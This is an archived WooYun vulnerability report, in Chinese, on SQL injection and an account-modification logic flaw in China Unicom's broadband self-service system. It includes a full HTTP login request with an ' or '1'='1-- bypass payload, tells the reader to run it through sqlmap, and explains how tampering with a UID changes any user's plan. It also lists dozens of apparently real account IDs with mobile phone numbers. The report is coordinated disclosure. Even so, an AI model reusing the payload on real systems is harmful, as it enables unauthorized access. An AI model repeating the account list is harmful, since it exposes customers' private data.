当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133462

漏洞标题:中国联通宽带自服务系统SQL注入可登录大量用户宽带后台拨号上网&逻辑漏洞修改用户上网套餐

相关厂商:中国联通

漏洞作者: 千斤拨四两

提交时间:2015-08-13 21:57

修复时间:2015-09-28 11:02

公开时间:2015-09-28 11:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-13: 细节已通知厂商并且等待厂商处理中
2015-08-14: 厂商已经确认,细节仅向厂商公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

话说这网费真够贵的,没网费了于是来充值网费,看了看这套系统,开始撸~~~于是乎,妈妈再也不动担心我上网了。。。

详细说明:

这套自服务系统是提供给小区一类局域网用来充值网费,相比很多小区都在用这套系统,使用这套系统都会受影响,说不定你已经被蹭网了,哈哈。。。
0x1:这是用户登录界面,用户名存在注入点。

q.png


w.png


E.png


但是存在一定的过滤机制,没有突破,但可以确定是IIS6+ASPX
消费记录查询SQL注入。

h.png


0x2:自服务后台登录框存在SQL注射,大把大把的拨号上网用户。

r.png


t.png


保存请求包放sqlmap里跑!

POST /Admin/Admin_Login.aspx HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.10/Admin/Admin_Login.aspx
Cookie: ASP.NET_SessionId=f0qdwlr0valkiucvr1o1te41; CheckCode=D0B4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 489
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE0NjkyNjQwNzYPZBYCAgEPZBYCAgcPD2QWAh4Hb25jbGljawUTcmV0dXJuIENoZWNrRm9ybSgpO2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC0ltZ2J0bnN1bWl013LAMPOETKvEy0dXd5YglELkWlZ4sLeGheLsuKT4Ev4%3D&__EVENTVALIDATION=%2FwEWBQL0odnjDgKl1bKdCAKd%2B7q4BwLChPy%2BDQKO4LDeAiYYkgsyhfXvCyDXr9kYiBVr619eNPTqcdAf8W6twOzR&txtusername=admin%2B%27%2Bor%27%2B1%3D1--%23&txtpwd=admin%2B%27%2Bor%27%2B1%3D1--%23&txtcode=D0B4&Imgbtnsumit.x=63&Imgbtnsumit.y=22


y.png


u.png


i.png


p.png


漏洞证明:

用户账户可拨号上网。

i.png


o.png


贴出部分可用用户账户,

sd600109  13520072903
sd600113  13701142565
sd600118  13651245153
sd600201  18211092015
sd600202  15810336316
sd600209  13488648861
sd600210  13661212892
sd600213  13522606422
sd600216  13051851410
sd600219  13718130922
sd601101  13011202880
sd601102  15910294958
sd601103  13466511607
sd601104  18500430512
sd601204  13611022769
sd601205  15120084461
sd601210  13716349662
sd601211  15110158024
sd601214  13691494690
sd7001a11 18511076559
sd7001a13 13718026502
sd7001a15 18600532473
sd7001a4  15822458530
sd7001a7  13683296112
sd7001a9  13439105466
sd7002b1  15210691260
sd7002b11 13466799430
sd7002b17 15652652371
sd7002b2  15811517273
sd7002b6  13911661302
sd7003c10 13363075333
sd7003c14 15810697038
sd7003c15 15801271047
sd7003c18 18201613589
sd7003c2  13720074187
sd7003c3  13811506509
sd7003c4  13263255337
sd7003c6  18710068935


登录一用户证明!

a.png


0x3:修改任意用户套餐,若被恶意利用此漏洞严重影响用户使用。

s.png


d.jpg


截断数据包修改UID就可直接修改套餐,证明此漏洞需找一个停网的用户,只有在停网时可修改套餐。

f.png


修改sd60017.

g.png


修复方案:

更新系统,系统存在过多漏洞,或者更换系统。

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-14 11:01

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无